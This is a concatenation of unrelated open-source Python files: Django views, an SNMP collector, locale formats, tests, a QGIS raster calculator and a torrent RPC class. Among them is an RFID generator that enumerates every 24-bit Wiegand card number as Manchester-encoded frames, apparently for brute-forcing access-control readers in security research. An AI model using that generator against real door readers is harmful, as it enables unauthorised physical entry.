leader_list = LeaderTable(leader_list)
tables.RequestConfig(request).configure(leader_list)
return render(
template_name='karaage/people/person_bounced_email.html',
context=locals(),
request=request)
@admin_required
def person_logs(request, username):
obj = get_object_or_404(Person, username=username)
breadcrumbs = [
("People", reverse("kg_person_list")),
(six.text_type(obj), reverse("kg_person_detail", args=[obj.username]))
]
return common.log_list(request, breadcrumbs, obj)
@admin_required
def add_comment(request, username):
obj = get_object_or_404(Person, username=username)
breadcrumbs = [
("People", reverse("kg_person_list")),
(six.text_type(obj), reverse("kg_person_detail", args=[obj.username]))
]
return common.add_comment(request, breadcrumbs, obj)
@login_required
def password_request(request, username):
person = get_object_or_404(Person, username=username)
error = None
post_reset_redirect = reverse(
'kg_person_reset_done', args=[person.username])
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this user.</p>')
elif not person.is_active:
error = "Person '%s' is deleted." % person.username
elif not person.login_enabled:
error = "Person '%s' is locked." % person.username
elif request.method == "POST":
send_reset_password_email(person)
return HttpResponseRedirect(post_reset_redirect)
var = {
'person': person,
'error': error,
}
return render(
template_name='karaage/people/person_password_request.html',
context=var,
request=request)
@login_required
def password_request_done(request, username):
person = get_object_or_404(Person, username=username)
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this user.</p>')
var = {
'person': person,
}
return render(
template_name='karaage/people/person_password_request_done.html',
context=var,
request=request)
class PasswordResetConfirmView(views.PasswordResetConfirmView):
form_class = SetPasswordForm
template_name = 'karaage/people/person_reset_confirm.html'
class PasswordResetCompleteView(views.PasswordResetCompleteView):
template_name = 'karaage/people/person_reset_complete.html'
|
pcostell/apitools
|
refs/heads/master
|
samples/servicemanagement_sample/servicemanagement_v1/__init__.py
|
415
|
"""Package marker file."""
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
python-diamond/Diamond
|
refs/heads/master
|
src/collectors/snmp/snmp.py
|
3
|
# coding=utf-8
"""
SNMPCollector is a special collector for collecting data by using SNMP
#### Dependencies
* pysnmp
"""
import socket
import warnings
# pysnmp packages on Debian 6.0 use the sha and md5 modules, which are
# deprecated. There is nothing to be done about it until pysnmp
# updates to the new hashlib module -- ignoring the warning for now
old_showwarning = warnings.showwarning
warnings.filterwarnings("ignore", category=DeprecationWarning)
cmdgen = None
try:
import pysnmp.entity.rfc3413.oneliner.cmdgen as cmdgen
import pysnmp.debug
except ImportError:
pysnmp = None
cmdgen = None
warnings.showwarning = old_showwarning
import diamond.collector
class SNMPCollector(diamond.collector.Collector):
def __init__(self, *args, **kwargs):
super(SNMPCollector, self).__init__(*args, **kwargs)
if cmdgen is not None:
self.snmpCmdGen = cmdgen.CommandGenerator()
def get_default_config_help(self):
config_help = super(SNMPCollector, self).get_default_config_help()
config_help.update({
'timeout': 'Seconds before timing out the snmp connection',
'retries': 'Number of times to retry before bailing',
})
return config_help
def get_default_config(self):
# Initialize default config
default_config = super(SNMPCollector, self).get_default_config()
default_config['path_suffix'] = ''
default_config['path_prefix'] = 'systems'
default_config['timeout'] = 5
default_config['retries'] = 3
# Return default config
return default_config
def _convert_to_oid(self, s):
d = s.split(".")
return tuple([int(x) for x in d])
def _convert_from_oid(self, oid):
return ".".join([str(x) for x in oid])
def collect(self):
for device in self.config['devices']:
host = self.config['devices'][device]['host']
port = self.config['devices'][device]['port']
community = self.config['devices'][device]['community']
self.collect_snmp(device, host, port, community)
def get(self, oid, host, port, community):
"""
Perform SNMP get for a given OID
"""
# Initialize return value
ret = {}
# Convert OID to tuple if necessary
if not isinstance(oid, tuple):
oid = self._convert_to_oid(oid)
# Convert Host to IP if necessary
host = socket.gethostbyname(host)
# Assemble SNMP Auth Data
snmpAuthData = cmdgen.CommunityData(
'agent-{}'.format(community),
community)
# Assemble SNMP Transport Data
snmpTransportData = cmdgen.UdpTransportTarget(
(host, port),
int(self.config['timeout']),
int(self.config['retries']))
        # Assemble SNMP Get Command
result = self.snmpCmdGen.getCmd(snmpAuthData, snmpTransportData, oid)
varBind = result[3]
# TODO: Error check
for o, v in varBind:
ret[str(o)] = v.prettyPrint()
return ret
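    # Hypothetical usage sketch (host, port and community are made-up values):
    #   self.get("1.3.6.1.2.1.1.5.0", "switch01.example.com", 161, "public")
    # would return something like {'1.3.6.1.2.1.1.5.0': 'switch01'} on success.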
def walk(self, oid, host, port, community):
"""
Perform an SNMP walk on a given OID
"""
# Initialize return value
ret = {}
# Convert OID to tuple if necessary
if not isinstance(oid, tuple):
oid = self._convert_to_oid(oid)
# Convert Host to IP if necessary
host = socket.gethostbyname(host)
# Assemble SNMP Auth Data
snmpAuthData = cmdgen.CommunityData(
'agent-{}'.format(community),
community)
# Assemble SNMP Transport Data
snmpTransportData = cmdgen.UdpTransportTarget(
(host, port),
int(self.config['timeout']),
int(self.config['retries']))
# Assemble SNMP Next Command
resultTable = self.snmpCmdGen.nextCmd(snmpAuthData,
snmpTransportData,
oid)
varBindTable = resultTable[3]
# TODO: Error Check
for varBindTableRow in varBindTable:
for o, v in varBindTableRow:
ret[str(o)] = v.prettyPrint()
return ret
|
AnhellO/DAS_Sistemas
|
refs/heads/development
|
Ago-Dic-2017/Enrique Castillo/Ordinario/test/Lib/site-packages/django/conf/locale/nl/formats.py
|
65
|
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
]
# Kept ISO formats as one is in first position
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
]
DATETIME_INPUT_FORMATS = [
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
    # '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 09 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
    # '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 09 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
    # '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 09 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
    # '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 09 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
    # '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
BuildingLink/sentry
|
refs/heads/master
|
tests/sentry/web/frontend/test_mailgun_inbound_webhook.py
|
6
|
from __future__ import absolute_import, print_function
import mock
from django.core.urlresolvers import reverse
from sentry.testutils import TestCase
from sentry.utils.email import group_id_to_email
body_plain = "foo bar"
class TestMailgunInboundWebhookView(TestCase):
def setUp(self):
super(TestMailgunInboundWebhookView, self).setUp()
self.event = self.create_event(event_id='a' * 32)
self.mailto = group_id_to_email(self.group.pk)
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_invalid_signature(self, process_inbound_email):
with self.options({'mail.mailgun-api-key': 'a' * 32}):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': '',
'token': '',
'timestamp': '',
})
assert resp.status_code == 200
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_missing_api_key(self, process_inbound_email):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': '',
'token': '',
'timestamp': '',
})
assert resp.status_code == 500
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_simple(self, process_inbound_email):
token = 'a' * 50
timestamp = '1422513193'
signature = '414a4705e6c12a39905748549f9135fbe8b739a5b12b2349ee40f31d3ee12f83'
with self.options({'mail.mailgun-api-key': 'a' * 32}):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': signature,
'token': token,
'timestamp': timestamp,
})
assert resp.status_code == 201
process_inbound_email.delay.assert_called_once_with(
self.user.email,
self.group.id,
body_plain,
)
|
VirusTotal/msticpy
|
refs/heads/master
|
tests/test_nbdisplay.py
|
1
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
import os
from pathlib import Path
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
import pytest
_NB_FOLDER = "docs/notebooks"
_NB_NAME = "EventClustering.ipynb"
class Testnbdisplay(unittest.TestCase):
"""Unit test class."""
@pytest.mark.skipif(
not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
)
def test_clustering_nbdisplay_notebook(self):
nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
abs_path = Path(_NB_FOLDER).absolute()
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
try:
ep.preprocess(nb, {"metadata": {"path": abs_path}})
except CellExecutionError:
nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
msg = f"Error executing the notebook '{nb_path}'.\n"
msg += f"See notebook '{nb_err}' for the traceback."
print(msg)
with open(nb_err, mode="w", encoding="utf-8") as f:
nbformat.write(nb, f)
raise
|
geopython/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/qgis/RasterCalculator.py
|
2
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
RasterLayerCalculator.py
---------------------
Date : November 2016
Copyright : (C) 2016 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'November 2016'
__copyright__ = '(C) 2016, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import math
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
from qgis.core import (QgsProcessing,
QgsProcessingException,
QgsProcessingUtils,
QgsProcessingParameterCrs,
QgsProcessingParameterMultipleLayers,
QgsProcessingParameterNumber,
QgsProcessingParameterExtent,
QgsProcessingParameterRasterDestination,
QgsProcessingParameterRasterLayer,
QgsProcessingOutputRasterLayer,
QgsProcessingParameterString,
QgsCoordinateTransform,
QgsMapLayer)
from qgis.PyQt.QtCore import QObject
from qgis.analysis import QgsRasterCalculator, QgsRasterCalculatorEntry
class RasterCalculator(QgisAlgorithm):
LAYERS = 'LAYERS'
EXTENT = 'EXTENT'
CELLSIZE = 'CELLSIZE'
EXPRESSION = 'EXPRESSION'
CRS = 'CRS'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster analysis')
def groupId(self):
return 'rasteranalysis'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
class ParameterRasterCalculatorExpression(QgsProcessingParameterString):
def __init__(self, name='', description='', multiLine=False):
super().__init__(name, description, multiLine=multiLine)
self.setMetadata({
'widget_wrapper': 'processing.algs.qgis.ui.RasterCalculatorWidgets.ExpressionWidgetWrapper'
})
def type(self):
return 'raster_calc_expression'
def clone(self):
return ParameterRasterCalculatorExpression(self.name(), self.description(), self.multiLine())
self.addParameter(ParameterRasterCalculatorExpression(self.EXPRESSION, self.tr('Expression'),
multiLine=True))
self.addParameter(QgsProcessingParameterMultipleLayers(self.LAYERS,
self.tr('Reference layer(s) (used for automated extent, cellsize, and CRS)'),
layerType=QgsProcessing.TypeRaster,
optional=True))
self.addParameter(QgsProcessingParameterNumber(self.CELLSIZE,
self.tr('Cell size (use 0 or empty to set it automatically)'),
type=QgsProcessingParameterNumber.Double,
minValue=0.0, defaultValue=0.0, optional=True))
self.addParameter(QgsProcessingParameterExtent(self.EXTENT,
self.tr('Output extent'),
optional=True))
self.addParameter(QgsProcessingParameterCrs(self.CRS, 'Output CRS', optional=True))
self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT, self.tr('Output')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def processAlgorithm(self, parameters, context, feedback):
expression = self.parameterAsString(parameters, self.EXPRESSION, context)
layers = self.parameterAsLayerList(parameters, self.LAYERS, context)
layersDict = {}
if layers:
layersDict = {lyr.source(): lyr for lyr in layers}
crs = self.parameterAsCrs(parameters, self.CRS, context)
if crs is None or not crs.isValid():
if not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor CRS provided"))
else:
crs = list(layersDict.values())[0].crs()
bbox = self.parameterAsExtent(parameters, self.EXTENT, context)
if bbox.isNull() and not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor extent box provided"))
if not bbox.isNull():
bboxCrs = self.parameterAsExtentCrs(parameters, self.EXTENT, context)
if bboxCrs != crs:
transform = QgsCoordinateTransform(bboxCrs, crs, context.project())
bbox = transform.transformBoundingBox(bbox)
if bbox.isNull() and layers:
bbox = QgsProcessingUtils.combineLayerExtents(layers, crs)
cellsize = self.parameterAsDouble(parameters, self.CELLSIZE, context)
if cellsize == 0 and not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor cellsize value provided"))
def _cellsize(layer):
ext = layer.extent()
if layer.crs() != crs:
transform = QgsCoordinateTransform(layer.crs(), crs, context.project())
ext = transform.transformBoundingBox(ext)
return (ext.xMaximum() - ext.xMinimum()) / layer.width()
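        # e.g. a layer 100 pixels wide whose extent spans 1000 CRS units
        # yields a cell size of 10 units; the smallest value across all
        # reference layers is used below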
if cellsize == 0:
cellsize = min([_cellsize(lyr) for lyr in layersDict.values()])
# check for layers available in the model
layersDictCopy = layersDict.copy() # need a shallow copy because next calls invalidate iterator
for lyr in layersDictCopy.values():
expression = self.mappedNameToLayer(lyr, expression, layersDict, context)
# check for layers available in the project
for lyr in QgsProcessingUtils.compatibleRasterLayers(context.project()):
expression = self.mappedNameToLayer(lyr, expression, layersDict, context)
        # create the list of layers to be passed as inputs to RasterCalculator
# at this phase expression has been modified to match available layers
# in the current scope
entries = []
for name, lyr in layersDict.items():
for n in range(lyr.bandCount()):
ref = '{:s}@{:d}'.format(name, n + 1)
if ref in expression:
entry = QgsRasterCalculatorEntry()
entry.ref = ref
entry.raster = lyr
entry.bandNumber = n + 1
entries.append(entry)
# Append any missing entry from the current project
for entry in QgsRasterCalculatorEntry.rasterEntries():
if not [e for e in entries if e.ref == entry.ref]:
entries.append(entry)
output = self.parameterAsOutputLayer(parameters, self.OUTPUT, context)
width = round((bbox.xMaximum() - bbox.xMinimum()) / cellsize)
height = round((bbox.yMaximum() - bbox.yMinimum()) / cellsize)
driverName = GdalUtils.getFormatShortNameFromFilename(output)
calc = QgsRasterCalculator(expression,
output,
driverName,
bbox,
crs,
width,
height,
entries)
res = calc.processCalculation(feedback)
if res == QgsRasterCalculator.ParserError:
raise QgsProcessingException(self.tr("Error parsing formula"))
return {self.OUTPUT: output}
def processBeforeAddingToModeler(self, algorithm, model):
values = []
expression = algorithm.params[self.EXPRESSION]
for i in list(model.inputs.values()):
param = i.param
            if isinstance(param, QgsProcessingParameterRasterLayer) and "{}@".format(param.name()) in expression:
values.append(ValueFromInput(param.name()))
if algorithm.name:
dependent = model.getDependentAlgorithms(algorithm.name)
else:
dependent = []
for alg in list(model.algs.values()):
if alg.modeler_name not in dependent:
for out in alg.algorithm.outputs:
if (isinstance(out, QgsProcessingOutputRasterLayer) and
"{}:{}@".format(alg.modeler_name, out.name) in expression):
values.append(ValueFromOutput(alg.modeler_name, out.name))
algorithm.params[self.LAYERS] = values
def mappedNameToLayer(self, lyr, expression, layersDict, context):
'''Try to identify if a real layer is mapped in the expression with a symbolic name.'''
nameToMap = lyr.source()
# check if nameToMap is a file
# TODO: what about URI eg for a COG?
if os.path.isfile(nameToMap):
# get only the name without extension and path of the file
nameToMap = os.path.splitext(os.path.basename(nameToMap))[0]
# check for layers directly added in the expression
if (nameToMap + "@") in expression:
layersDict[nameToMap] = lyr
# get "algorithm_inputs" scope of the expressionContext related
# with mapped variables
indexOfScope = context.expressionContext().indexOfScope("algorithm_inputs")
if indexOfScope >= 0:
expContextAlgInputsScope = context.expressionContext().scope(indexOfScope)
# check for the layers that are mapped as input in a model
# to do this check in the latest scope all passed variables
# to look for a variable that is a layer or a string filename
# to a layer
varDescription = None
for varName in expContextAlgInputsScope.variableNames():
layerInContext = expContextAlgInputsScope.variable(varName)
if not isinstance(layerInContext, str) and not isinstance(layerInContext, QgsMapLayer):
continue
if isinstance(layerInContext, QgsMapLayer) and nameToMap not in layerInContext.source():
continue
varDescription = expContextAlgInputsScope.description(varName)
            # variables can have a None or "" description, so skip those
if not varDescription:
continue
            # check if its description starts with "Output", as in:
# Output 'Output' from algorithm 'calc1'
# as set in https://github.com/qgis/QGIS/blob/master/src/core/processing/models/qgsprocessingmodelalgorithm.cpp#L516
# but var in expression is called simply
# 'Output' from algorithm 'calc1'
# get the translation string to use to parse the description
# HAVE to use the same translated string as in
# https://github.com/qgis/QGIS/blob/master/src/core/processing/models/qgsprocessingmodelalgorithm.cpp#L516
translatedDesc = self.tr("Output '%1' from algorithm '%2'")
            elementZero = translatedDesc.split(" ")[0]  # for English this should be "Output"
elements = varDescription.split(" ")
if len(elements) > 1 and elements[0] == elementZero:
                # remove the leading tr("Output ") string; note the space added after elementZero
varDescription = varDescription[len(elementZero) + 1:]
# check if cleaned varDescription is present in the expression
# if not skip it
if (varDescription + "@") not in expression:
continue
# !!!found!!! => substitute in expression
# and add in the list of layers that will be passed to raster calculator
nameToMap = varName
new = "{}@".format(nameToMap)
old = "{}@".format(varDescription)
expression = expression.replace(old, new)
layersDict[nameToMap] = lyr
        # need to return the modified expression, since the string is not modified by reference
return expression
|
ouspg/ridac
|
refs/heads/master
|
open-simsim/generator.py
|
1
|
import time
import os
toInts = lambda l: [int(i) for i in l]
takeOne = lambda l,n: [i[n] for i in l]
heads = lambda l: [l[i:] for i in range(len(l))]
tails = lambda l: [l[:i+1] for i in range(len(l))]
concat = lambda l: [j for i in l for j in i]
toStr = lambda i: "".join(map(str,i))
"""the IEEE 802.5"""
standardManchester = lambda b:[ [0,1],[1,0]][b]
startSeq = [0,0,0,1,1,1]
manchester = lambda bits: startSeq + concat( [
standardManchester(i) for i in bits
])
evenBit = lambda bits: sum(bits )%2
oddBit = lambda bits: ( evenBit(bits) +1 )%2
wiegandParities = lambda bits: concat([
[evenBit(bits[:12])],
bits[:12],
bits[12:],
[oddBit(bits[12:])]
])
manchesterDecode = lambda k : [ v for i,v in enumerate(k[6:]) if i%2 == 0]
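# Illustrative round trip, derived from the definitions above:
#   manchester([1, 0]) -> [0, 0, 0, 1, 1, 1, 1, 0, 0, 1]
#   manchesterDecode(manchester([1, 0])) -> [1, 0]
# wiegandParities() wraps 24 data bits into a 26-bit Wiegand frame:
# an even parity bit over the first 12 bits, the data itself, then an
# odd parity bit over the last 12 bits.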
def printDataValues(s, printVals=True):
d = {}
d['allBits'] = s
d['frameStart'] = s[:19]
d['wiegandData'] = s[19:]
d['firstBlock'] = s[19:32]
d['secondBlock'] = s[33:45]
d['evenBit'] = s[19]
d['oddBit'] = s[44]
d['facilityCode'] = s[20:28]
d['firstPartOfCardnumber'] = s[28:32]
d['secondPartOfCardNumber'] = s[33:44]
d['facilityCodeAsInteger'] = toInteger(toInts(d['facilityCode']))
d['firstPartNmbrAsInteger'] = toInteger(toInts(d['firstPartOfCardnumber']))
d['secondPartNmbAsInteger'] = toInteger(toInts(d['secondPartOfCardNumber']))
d['cardNumberAsInteger'] = toInteger(toInts(s[28:44]))
d['wiegandDataAsInteger'] = toInteger(toInts(s[20:44]))
print """
* Read manchester decoded bit sequence:
%(allBits)s
* protocol information, wiegand data:
%(frameStart)s, %(wiegandData)s
* first wiegand block, second wiegand block:
%(firstBlock)s, %(secondBlock)s
* evenBit, facility code, 1. part of the card number, 2. part of the card number, odd bit:
%(evenBit)s, %(facilityCode)s, %(firstPartOfCardnumber)s, %(secondPartOfCardNumber)s, %(oddBit)s
* integer conversions:
* facility number, 1. part of the card number, 2. part of the card number,
%(facilityCodeAsInteger)s,%(firstPartNmbrAsInteger)s,%(secondPartNmbAsInteger)s,
* combined card number as integer:
%(cardNumberAsInteger)s
* whole wiegand data block as an integer:
%(wiegandDataAsInteger)s
"""%d
standardFrameStart = [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
dataFrame = lambda data: standardFrameStart + wiegandParities(data)
def tobits(x, digits=16):
r = []
for i in range(digits):
r.insert(0,x % 2)
x >>= 1
return r
toInteger = lambda k: sum([v*2**(len(k)-1-i) for i,v in enumerate(k)])
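# Illustrative round trip, derived from the definitions above:
#   tobits(5, digits=4) -> [0, 1, 0, 1]
#   toInteger([0, 1, 0, 1]) -> 5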
def makeKeyFromInteger(i):
return manchester(dataFrame(tobits(i,digits=24)))
def yieldAllKeysInOrder(start=0, stop=2**24):
for i in range(start, stop):
yield makeKeyFromInteger(i)
toBCD = lambda n: [ toStr(tobits(int(d),4)) for d in str(n) ]
def binSearch(n):
m = 2**n
i = m / 2
yield 0
yield m-1
while i >= 1:
moduloCnt = 0
index = 0
while index < m:
index += i
if moduloCnt % 2 == 0:
yield index
moduloCnt += 1
i /= 2
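# Illustrative ordering, obtained by tracing the generator (duplicates
# can occur): list(binSearch(2)) -> [0, 3, 2, 1, 3]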
def yieldAllKeysInBinarySearchFashion():
for i in binSearch(24):
yield makeKeyFromInteger(i)
def writeKeyBlockToFile(generator,
fname= "keytest.txt",
start = 0,
stop = 2**24,
repeats = 1
):
t1 = time.time()
tmpfilename = os.tempnam(".")
f = open(tmpfilename, "w")
cnt = 0
for bitString in generator:
for r in range(repeats):
f.write(toStr(bitString))
f.flush()
if cnt > stop - start - 1:
print cnt,bitString
break
cnt += 1
f.close()
t2 = time.time()
print 'generation time:', t2 - t1
#print open(tmpfilename).read()
while os.path.exists(fname):
"""this 0.041 is the time that it takes to send a one key seqv"""
pollingTime = 2 #repeats * 0.041 * ( stop - start ) / 2.0
print pollingTime
time.sleep(pollingTime)
os.rename(tmpfilename, fname)
|
gboudreau/CouchPotato
|
refs/heads/master
|
library/transmissionrpc/torrent.py
|
10
|
# -*- coding: utf-8 -*-
# Copyright (c) 2008-2010 Erik Svensson <erik.public@gmail.com>
# Licensed under the MIT license.
import sys, datetime
from transmissionrpc.constants import STATUS, PRIORITY
from transmissionrpc.utils import format_timedelta
class Torrent(object):
"""
    Torrent is a class holding the data received from Transmission regarding a bittorrent transfer.
    All fetched torrent fields are accessible through this class using attributes.
This class has a few convenience properties using the torrent data.
"""
def __init__(self, client, fields):
if 'id' not in fields:
raise ValueError('Torrent requires an id')
self.fields = {}
self.update(fields)
self.client = client
def _getNameString(self, codec=None):
        if codec is None:
codec = sys.getdefaultencoding()
name = None
# try to find name
if 'name' in self.fields:
name = self.fields['name']
# if name is unicode, try to decode
if isinstance(name, unicode):
try:
name = name.encode(codec)
except UnicodeError:
name = None
return name
def __repr__(self):
tid = self.fields['id']
name = self._getNameString()
if isinstance(name, str):
return '<Torrent %d \"%s\">' % (tid, name)
else:
return '<Torrent %d>' % (tid)
def __str__(self):
name = self._getNameString()
if isinstance(name, str):
return 'Torrent \"%s\"' % (name)
else:
return 'Torrent'
def __copy__(self):
return Torrent(self.client, self.fields)
def update(self, other):
"""
        Update the torrent data from a Transmission JSON-RPC arguments dictionary
"""
fields = None
if isinstance(other, dict):
fields = other
elif isinstance(other, Torrent):
fields = other.fields
else:
raise ValueError('Cannot update with supplied data')
for key, value in fields.iteritems():
self.fields[key.replace('-', '_')] = value
def files(self):
"""
Get list of files for this torrent.
This function returns a dictionary with file information for each file.
        The file information has the following fields:
::
{
<file id>: {
'name': <file name>,
'size': <file size in bytes>,
'completed': <bytes completed>,
'priority': <priority ('high'|'normal'|'low')>,
'selected': <selected for download>
}
...
}
"""
result = {}
if 'files' in self.fields:
            indices = xrange(len(self.fields['files']))
files = self.fields['files']
priorities = self.fields['priorities']
wanted = self.fields['wanted']
            for item in zip(indices, files, priorities, wanted):
selected = True if item[3] else False
priority = PRIORITY[item[2]]
result[item[0]] = {
'selected': selected,
'priority': priority,
'size': item[1]['length'],
'name': item[1]['name'],
'completed': item[1]['bytesCompleted']}
return result
def __getattr__(self, name):
try:
return self.fields[name]
except KeyError:
raise AttributeError('No attribute %s' % name)
@property
def status(self):
"""
Returns the torrent status. Is either one of 'check pending', 'checking',
'downloading', 'seeding' or 'stopped'. The first two is related to
verification.
"""
return STATUS[self.fields['status']]
@property
def progress(self):
"""Get the download progress in percent."""
try:
return 100.0 * (self.fields['sizeWhenDone'] - self.fields['leftUntilDone']) / float(self.fields['sizeWhenDone'])
except ZeroDivisionError:
return 0.0
@property
def ratio(self):
"""Get the upload/download ratio."""
try:
return self.fields['uploadedEver'] / float(self.fields['downloadedEver'])
except ZeroDivisionError:
return 0.0
@property
def eta(self):
"""Get the "eta" as datetime.timedelta."""
eta = self.fields['eta']
if eta >= 0:
return datetime.timedelta(seconds=eta)
else:
            raise ValueError('eta not valid')
@property
def date_active(self):
"""Get the attribute "activityDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['activityDate'])
@property
def date_added(self):
"""Get the attribute "addedDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['addedDate'])
@property
def date_started(self):
"""Get the attribute "startDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['startDate'])
@property
def date_done(self):
"""Get the attribute "doneDate" as datetime.datetime."""
